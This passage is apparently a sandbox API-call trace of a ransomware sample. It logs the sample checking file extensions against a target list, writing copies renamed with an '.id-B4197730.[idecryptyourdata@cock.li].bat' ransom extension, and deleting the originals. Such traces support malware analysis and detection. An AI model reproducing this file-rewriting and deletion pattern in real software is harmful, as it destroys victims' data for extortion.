dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.481] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0046.482] GetLastError () returned 0x0 [0046.482] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4a, lpOverlapped=0x0) returned 1 [0046.492] WriteFile (in: hFile=0x2dc, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x50, lpOverlapped=0x0) returned 1 [0046.493] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.493] WriteFile (in: hFile=0x2dc, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xea, lpOverlapped=0x0) returned 1 [0046.493] SetEndOfFile (hFile=0x2dc) returned 1 [0046.493] CloseHandle (hObject=0x2dc) returned 1 [0046.494] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.494] SetEndOfFile (hFile=0x2c8) returned 1 [0046.494] CloseHandle (hObject=0x2c8) returned 1 [0046.495] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.495] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 1 [0046.495] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.495] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.495] lstrlenW (lpString=".doc") returned 4 [0046.495] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0046.495] lstrlenW (lpString=".docx") returned 5 [0046.496] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0046.496] lstrlenW (lpString=".pdf") returned 4 [0046.496] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString=".xls") returned 4 [0046.496] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString=".xlsx") returned 5 [0046.496] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0046.496] lstrlenW (lpString=".ppt") returned 4 [0046.496] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.496] lstrlenW (lpString=".zip") returned 4 [0046.496] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString=".rar") returned 4 [0046.496] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString=".bz2") returned 4 [0046.496] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0046.496] lstrlenW (lpString=".7z") returned 3 [0046.496] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0046.496] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.496] lstrlenW (lpString=".dbf") returned 4 [0046.496] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.496] lstrlenW (lpString=".1cd") returned 4 [0046.496] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0046.496] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.496] lstrlenW (lpString=".jpg") returned 4 [0046.496] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.496] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.496] lstrlenW (lpString=".doc") returned 4 [0046.496] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString=".docx") returned 5 [0046.496] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0046.496] lstrlenW (lpString=".pdf") returned 4 [0046.496] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0046.496] lstrlenW (lpString=".xls") returned 4 [0046.497] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0046.497] lstrlenW (lpString=".xlsx") returned 5 [0046.497] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0046.497] lstrlenW (lpString=".ppt") returned 4 [0046.497] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0046.497] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.497] lstrlenW (lpString=".zip") returned 4 [0046.497] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0046.497] lstrlenW (lpString=".rar") returned 4 [0046.497] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0046.497] lstrlenW (lpString=".bz2") returned 4 [0046.497] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0046.497] lstrlenW (lpString=".7z") returned 3 [0046.497] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0046.497] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.497] lstrlenW (lpString=".dbf") returned 4 [0046.497] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0046.497] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.497] lstrlenW (lpString=".1cd") returned 4 [0046.497] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0046.497] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0046.497] lstrlenW (lpString=".jpg") returned 4 [0046.497] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0046.497] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.497] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.497] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.497] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=18776) returned 1 [0046.497] CloseHandle (hObject=0x2c8) returned 1 [0046.498] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 0x80 [0046.498] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.498] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.498] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.498] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.498] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0046.499] GetLastError () returned 0x0 [0046.499] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4958, lpOverlapped=0x0) returned 1 [0046.501] WriteFile (in: hFile=0x2e8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4960, lpOverlapped=0x0) returned 1 [0046.502] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.502] WriteFile (in: hFile=0x2e8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.502] SetEndOfFile (hFile=0x2e8) returned 1 [0046.502] CloseHandle (hObject=0x2e8) returned 1 [0046.503] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.503] SetEndOfFile (hFile=0x2c8) returned 1 [0046.504] CloseHandle (hObject=0x2c8) returned 1 [0046.504] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.504] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 1 [0046.504] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.504] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.504] lstrlenW (lpString=".doc") returned 4 [0046.504] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.504] lstrlenW (lpString=".docx") returned 5 [0046.504] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.504] lstrlenW (lpString=".pdf") returned 4 [0046.504] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.504] lstrlenW (lpString=".xls") returned 4 [0046.504] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.504] lstrlenW (lpString=".xlsx") returned 5 [0046.505] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.505] lstrlenW (lpString=".ppt") returned 4 [0046.505] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString=".zip") returned 4 [0046.505] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString=".rar") returned 4 [0046.505] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString=".bz2") returned 4 [0046.505] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.505] lstrlenW (lpString=".7z") returned 3 [0046.505] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString=".dbf") returned 4 [0046.505] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString=".1cd") returned 4 [0046.505] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString=".jpg") returned 4 [0046.505] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString=".doc") returned 4 [0046.505] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString=".docx") returned 5 [0046.505] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.505] lstrlenW (lpString=".pdf") returned 4 [0046.505] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString=".xls") returned 4 [0046.505] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString=".xlsx") returned 5 [0046.505] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.505] lstrlenW (lpString=".ppt") returned 4 [0046.505] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.505] lstrlenW (lpString=".zip") returned 4 [0046.505] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.506] lstrlenW (lpString=".rar") returned 4 [0046.506] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.506] lstrlenW (lpString=".bz2") returned 4 [0046.506] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.506] lstrlenW (lpString=".7z") returned 3 [0046.506] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.506] lstrlenW (lpString=".dbf") returned 4 [0046.506] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.506] lstrlenW (lpString=".1cd") returned 4 [0046.506] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0046.506] lstrlenW (lpString=".jpg") returned 4 [0046.506] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.506] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.506] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.506] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.506] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=19288) returned 1 [0046.506] CloseHandle (hObject=0x2c8) returned 1 [0046.506] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 0x80 [0046.506] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.506] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.507] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.507] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.507] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0046.508] GetLastError () returned 0x0 [0046.508] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4b58, lpOverlapped=0x0) returned 1 [0046.509] WriteFile (in: hFile=0x2e8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4b60, lpOverlapped=0x0) returned 1 [0046.511] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.511] WriteFile (in: hFile=0x2e8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.511] SetEndOfFile (hFile=0x2e8) returned 1 [0046.511] CloseHandle (hObject=0x2e8) returned 1 [0046.512] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.512] SetEndOfFile (hFile=0x2c8) returned 1 [0046.513] CloseHandle (hObject=0x2c8) returned 1 [0046.513] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.514] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 1 [0046.514] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.514] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.514] lstrlenW (lpString=".doc") returned 4 [0046.514] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.514] lstrlenW (lpString=".docx") returned 5 [0046.514] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.514] lstrlenW (lpString=".pdf") returned 4 [0046.514] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.514] lstrlenW (lpString=".xls") returned 4 [0046.514] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.514] lstrlenW (lpString=".xlsx") returned 5 [0046.514] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.514] lstrlenW (lpString=".ppt") returned 4 [0046.514] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.514] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.514] lstrlenW (lpString=".zip") returned 4 [0046.514] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.514] lstrlenW (lpString=".rar") returned 4 [0046.514] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.514] lstrlenW (lpString=".bz2") returned 4 [0046.514] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.514] lstrlenW (lpString=".7z") returned 3 [0046.514] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.515] lstrlenW (lpString=".dbf") returned 4 [0046.515] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.515] lstrlenW (lpString=".1cd") returned 4 [0046.515] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.515] lstrlenW (lpString=".jpg") returned 4 [0046.515] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.515] lstrlenW (lpString=".doc") returned 4 [0046.515] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString=".docx") returned 5 [0046.515] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.515] lstrlenW (lpString=".pdf") returned 4 [0046.515] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString=".xls") returned 4 [0046.515] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString=".xlsx") returned 5 [0046.515] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.515] lstrlenW (lpString=".ppt") returned 4 [0046.515] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.515] lstrlenW (lpString=".zip") returned 4 [0046.515] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString=".rar") returned 4 [0046.515] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.515] lstrlenW (lpString=".bz2") returned 4 [0046.515] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.515] lstrlenW (lpString=".7z") returned 3 [0046.515] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.516] lstrlenW (lpString=".dbf") returned 4 [0046.516] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.516] lstrlenW (lpString=".1cd") returned 4 [0046.516] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0046.516] lstrlenW (lpString=".jpg") returned 4 [0046.516] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.516] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.516] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.516] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.516] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=17240) returned 1 [0046.516] CloseHandle (hObject=0x2c8) returned 1 [0046.516] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 0x80 [0046.516] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.516] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.517] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.517] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.517] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.971] GetLastError () returned 0x0 [0046.971] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4358, lpOverlapped=0x0) returned 1 [0046.973] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4360, lpOverlapped=0x0) returned 1 [0046.974] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.974] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.974] SetEndOfFile (hFile=0x2e0) returned 1 [0046.974] CloseHandle (hObject=0x2e0) returned 1 [0046.975] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.975] SetEndOfFile (hFile=0x2c8) returned 1 [0046.977] CloseHandle (hObject=0x2c8) returned 1 [0046.977] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.977] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 1 [0046.977] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.977] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.977] lstrlenW (lpString=".doc") returned 4 [0046.977] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.977] lstrlenW (lpString=".docx") returned 5 [0046.977] lstrcmpiW 